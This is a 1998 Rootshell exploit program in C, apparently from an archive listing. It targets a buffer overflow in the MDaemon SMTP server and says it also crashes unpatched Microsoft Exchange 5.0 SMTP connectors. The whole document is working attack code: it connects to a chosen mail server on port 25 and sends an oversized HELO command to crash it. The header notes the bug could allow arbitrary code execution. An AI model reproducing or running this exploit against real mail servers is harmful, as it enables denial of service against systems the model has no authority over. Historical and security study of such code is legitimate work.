home *** CD-ROM | disk | FTP | other *** search
- /*
- * MDaemon SMTP server for Windows buffer overflow exploit
- *
- * http://www.mdaemon.com - if you dare...
- *
- * Tested on MDaemon 2.71 SP1
- *
- * http://www.rootshell.com/
- *
- * Released 3/10/98
- *
- * (C) 1998 Rootshell All Rights Reserved
- *
- * For educational use only. Distribute freely.
- *
- * Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail
- * connector if SP2 has NOT been installed.
- *
- * Danger!
- *
- * A malicous user could use this bug to execute arbitrary code on the
- * remote system.
- *
- */
-
-
- #include <stdio.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <netdb.h>
- #include <string.h>
- #include <stdlib.h>
- #include <unistd.h>
-
-
- void main(int argc, char *argv[])
- {
- struct sockaddr_in sin;
- struct hostent *hp;
- char *buffer;
- int sock, i;
-
-
- if (argc != 2) {
- printf("usage: %s <smtp server>\n", argv[0]);
- exit(1);
- }
- hp = gethostbyname(argv[1]);
- if (hp==NULL) {
- printf("Unknown host: %s\n",argv[1]);
- exit(1);
- }
- bzero((char*) &sin, sizeof(sin));
- bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
- sin.sin_family = hp->h_addrtype;
- sin.sin_port = htons(25);
- sock = socket(AF_INET, SOCK_STREAM, 0);
- connect(sock,(struct sockaddr *) &sin, sizeof(sin));
- buffer = (char *)malloc(10000);
- sprintf(buffer, "HELO ");
- for (i = 0; i<4096; i++)
- strcat(buffer, "x");
- strcat(buffer, "\r\n");
- write(sock, &buffer[0], strlen(buffer));
- close(sock);
- free(buffer);
- }
-
-
